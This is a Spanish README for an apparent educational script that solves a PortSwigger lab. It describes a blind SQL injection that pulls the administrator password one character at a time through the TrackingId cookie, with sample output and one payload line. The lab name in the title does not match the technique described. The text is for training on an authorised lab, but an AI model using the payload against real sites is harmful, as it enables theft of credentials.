Herramienta educativa para resolver el laboratorio "SQL injection vulnerability allowing login bypass" de PortSwigger Web Security Academy.
Este script realiza un ataque de fuerza bruta por inyección SQL para extraer carácter por carácter la contraseña del usuario administrator mediante la cookie TrackingId.
- Extracción automática de la contraseña (máx. 20 caracteres)
- Soporte para interrupción limpia con
Ctrl+C - Progreso visual con
pwntoolsytermcolor - Manejo de errores de red y timeouts
- Evita rate limiting con pausas
pip install requests pwntools termcolor[+] SQLI: Iniciando ataque de fuerza bruta
[+] SQLI: Probando posición 1: a
[+] SQLI: Probando posición 1: b
[+] SQLI: Probando posición 1: c
[+] Password: c
[+] SQLI: Probando posición 2: 0
[+] Password: c0
...
[+] Contraseña del administrador: c0d3r123abcxyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='c'-- -Uso exclusivo educativo y ético. Solo en entornos autorizados como PortSwigger Labs.